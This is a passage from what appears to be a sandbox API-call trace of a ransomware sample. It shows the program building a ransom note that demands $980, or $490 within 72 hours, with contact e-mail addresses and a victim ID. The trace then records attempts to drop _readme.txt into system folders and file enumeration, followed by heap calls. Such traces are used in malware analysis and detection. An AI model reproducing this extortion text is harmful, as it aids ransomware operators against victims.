and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.676] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.676] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.676] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.677] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.677] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.677] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.677] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.677] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.684] 